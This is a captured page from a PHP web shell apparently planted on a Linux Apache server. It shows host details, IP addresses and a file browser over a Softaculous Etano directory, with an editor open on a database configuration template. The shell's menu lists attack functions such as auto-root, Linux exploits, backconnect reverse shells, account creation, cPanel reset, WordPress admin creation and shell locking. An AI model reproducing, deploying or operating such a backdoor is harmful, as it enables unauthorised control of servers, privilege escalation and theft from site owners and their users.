Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 172.70.131.97
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
etano /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
6.24
KB
-rw-r--r--
csrf-secret.php
30
B
-rw-r--r--
defines.inc.php
1.27
KB
-rw-r--r--
edit.php
3.73
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
1.79
KB
-rw-r--r--
import.php
2.86
KB
-rw-r--r--
info.xml
1.66
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.8
KB
-rw-r--r--
install.xml
909
B
-rw-r--r--
md5
6.42
KB
-rw-r--r--
notes.txt
299
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : defines.inc.php
<?php define('_DBHOST_','[[softdbhost]]');// mysql server host name define('_DBUSER_','[[softdbuser]]');// mysql database username define('_DBPASS_','[[softdbpass]]');// mysql database password define('_DBNAME_','[[softdb]]');// mysql database name define('_SITENAME_','[[site_name]]');// Your site name define('_BASEURL_','[[softurl]]');// protocol required (http:// ) define('_BASEPATH_','[[softpath]]');// path on server to your site define('_PHOTOURL_',_BASEURL_.'/media/pics');// protocol required (http:// ). URL to your member photos define('_PHOTOPATH_',_BASEPATH_.'/media/pics');// path on server to your member photos define('_CACHEPATH_',_BASEPATH_.'/cache');// path on server to the cache folder define('_FILEOP_MODE_','disk'); define('_FTPHOST_',''); define('_FTPPATH_',''); define('_FTPUSER_',''); define('_FTPPASS_',''); $dbtable_prefix=$GLOBALS['dbtable_prefix']='dsb_'; define('USER_ACCOUNTS_TABLE',"{$dbtable_prefix}user_accounts"); define('USER_ACCOUNT_ID','user_id'); define('USER_ACCOUNT_USER','user'); define('USER_ACCOUNT_PASS','pass'); define('PASSWORD_ENC_FUNC','md5'); define('_LICENSE_KEY_','[[key_gen]]'); // md5()=[[md5_key_gen]] define('_INTERNAL_VERSION_','2.80'); $accepted_results_per_page=array(10=>10,5=>5,15=>15,20=>20); $accepted_images=array('jpg','jpeg','png');
Close